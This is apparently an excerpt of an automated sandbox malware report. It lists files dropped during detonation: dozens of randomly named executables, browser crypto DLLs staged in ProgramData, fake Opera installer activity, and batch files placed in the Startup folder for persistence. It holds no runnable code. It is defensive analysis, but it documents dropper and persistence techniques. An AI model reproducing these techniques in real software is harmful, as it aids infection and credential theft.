                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeJump to dropped file
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeFile created: C:\Users\user\AppData\Local\Temp\u1hw.0.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\9UmuglKcKHgfePSzDJeh2tr3.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\jZXBdg5rull5j6LgJCWVgVos.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\bfxtyeVJT5bBfIUy0v6XVgPU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\fkwQUocr72Hw75SyPBzpetnQ.exeJump to dropped file
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeFile created: C:\Users\user\AppData\Local\Temp\u5v8.0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\vU4jsQbpuBQoMcavMx7b1jzX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\JMNwDYLRHcfb7Lck3bh1QS4f.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\01ySZukOlUcP5NF6FSceJyuX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\QFdxqcJJKBnNvVH34NTBZO9k.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\62dRoO3BlNtGMcLNCSYzZeqJ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Default12_my[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\rdJ9fWEopei9Jq2a4C4fmX3Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\p9kj7yqazy7x5QKCpeuskKjf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\9SfnYxeY7MBStUWc3d6vaufA.exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[2].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\tSUKH8w2Pv8sgaLWrFPRDr1i.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\XqzL1fMvCxCCFKp0SSzKRmTk.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\gs73fZcRyFDJYoYkZbrtadCy.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\pHBfSuis1Xhkv6ZdHJOyObLb.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\zfeRg1KL3b6mzyGkHfaolHvL.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\tByrAP8ibeDbCSADnquqVBQi.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\2pjOwxxUjFNOdrkI94TdGraH.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\MLHy8CHCXXPjzOh2OJFrG13g.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\qGkRm1tZi3ZgbNWlurynDnJq.exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937382151588.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exeJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[4].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\s2d02ZEHUbxI410yPzvUYGTP.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\XE6DyfdivLtuouzog1ddAcWy.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\SsTCNrfNwbE2RJWH23gTlxFP.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\ult4yIpyxeTm9lUFFOHFNl2P.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\lOl0Z8MedrKL384KSuZP1lEu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\snOfq5H0Ss3VGXsE0fRFljun.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Fh7qhqxo9lqcq8fZJGpCZFiC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\060[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\VKzps0C0te7NTLkv4QCHU1YW.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\hKiTsf257VLWDEryVqhdGiax.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\GyEiPhmZ7wFSCYXwTgsPkluJ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\nMCfbx6hx0DUWGYJuDAMUAIJ.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\cad54ba5b01423b1af8ec10ab5719d97[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\vMRsi4avLKS3BjZRk9vaqhZz.exeJump to dropped file
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeFile created: C:\Users\user\AppData\Local\Temp\u4dc.1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\7ajn4zo6v0GdgVSDv67pQ6UA.exeJump to dropped file
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeFile created: C:\Users\user\AppData\Local\Temp\u46g.0.exeJump to dropped file
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeFile created: C:\Users\user\AppData\Local\Temp\u4hg.0.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\urA10ZckYEEXLZZov5c00RO_.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\PNqnjNHui8frV2dffCZrA05K.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\SlHGsDZGgkpk7MxF0QDuypot.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\RHyh0hfeaEHqborlFdL4LJTH.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\nxx62MIcAq1mLUazdUlt2emv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\wkp6W1E2mbyM9VriyJKcQkLy.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\mPkGObww76qlp1C09a4tgBES.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\2YL4IgWcBHinkIA211vO9Bpr.exeJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\ARP.EXEJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\xXfU3dY2WEStW3xUEgs7rT08.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\TD0DvTWbvdprpaFzaf7f79H8.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\6iaJRQnw7XfTmk0UWiyyOxOe.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\8wsOStmCG25nWXULr6UWy2Q5.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exeJump to dropped file
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeFile created: C:\Users\user\AppData\Local\Temp\u624.0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\wv3L00mTLTTnOX1S2obszDcX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\NwvsoZspGn6vizp2axhKoY0Z.exeJump to dropped file
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeFile created: C:\Users\user\AppData\Local\Temp\u69w.1.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\timeSync[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\r0DfbOvsdOtWhxCPYUgwqjYI.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\NpXiURSjfclxWgcUlkMD5eJ8.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\63TGqnDkcQpbTyiukd2djP6a.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\VmjwaGr6tPcRf0rEBWGZ46z3.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\skOP6h6U62cLrOTEAXi7XUT4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\0Flev5sTDyJ3duKpLfv5ka2Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\9teA9V2job1p0o0lcg2CuXcR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\ugGFIzLnD3Xk89zL7XSYeDGh.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\IsEPzSszgrCYUPQvHPDrLyFU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeFile created: C:\Users\user\AppData\Local\Temp\u33c.1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\appidpolicyconverter.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\jTODdSkaulFxtvMU8WoUUyzs.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\W7lXXTFWXeTByuMsbD5hqZaG.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\a17F4G7WEa7FlwVixhjX6uYK.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeFile created: C:\Users\user\AppData\Local\Temp\u46g.1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\idw0Y68mq2UfXecINGuMfSFO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\FQM2AbwszjT1lQzUoXGDxSTy.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\QbLPxQThjmTC7G98txUkfov6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\1CGwy9Tr3ZgPn871BvByOPxR.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\oItrqw2PxeTCx2grDJJI9Sqg.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\W9xI9q4MOUfVc9D8gPa3VVtC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeFile created: C:\Users\user\AppData\Local\Temp\u4hg.1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\zFZkiprzkq8Ae7mkklwscu5a.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\QV2CtvThMWBnTkQtNtmINgo7.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\5Q13Z1W5QdpwzXbxGFAdEXdB.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\t5dER7PVcN8YbrHzsawB4xKm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\VgRPuj2QfERyAHULRBeO1F20.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\alB5HeuQna7ct24xMLLWf2EN.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\zWhvfqZrtT7TUoWor4gRArPv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\aTFJoaTi8xkup68H3WyrFIbQ.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeFile created: C:\Users\user\AppData\Local\Temp\u2r8.0.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\790489aa[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeFile created: C:\Users\user\AppData\Local\Temp\u69w.0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\JUzoV9GxBJCDHhTcPnbRBLla.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\IWNHTSCpSFApuke51w2EhXTa.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\saftSBfOyQtbUhRB42BwTwJm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\wDhpi03qlIbaSzF5WZoKo8eV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeFile created: C:\Users\user\AppData\Local\Temp\u624.1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeFile created: C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JUnCNhn.exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213748763.log
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213755078.log

                        Boot Survival

                        barindex
                        Drops script or batch files to the startup folder
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4wmr0Bf4EXaMCuRI7IEqrEN.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JlRLEIpF3kijytHz1FaeY3WZ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UYav4djsSfeWrnxzOp8uz2JM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5vz9LfAQRgiDqx5aIN1rUzgI.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7IdlNY4tr5xX5jsAv5Xm1aGP.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cg01RYFCgQ4yuUBvkQoejwXD.batJump to dropped file
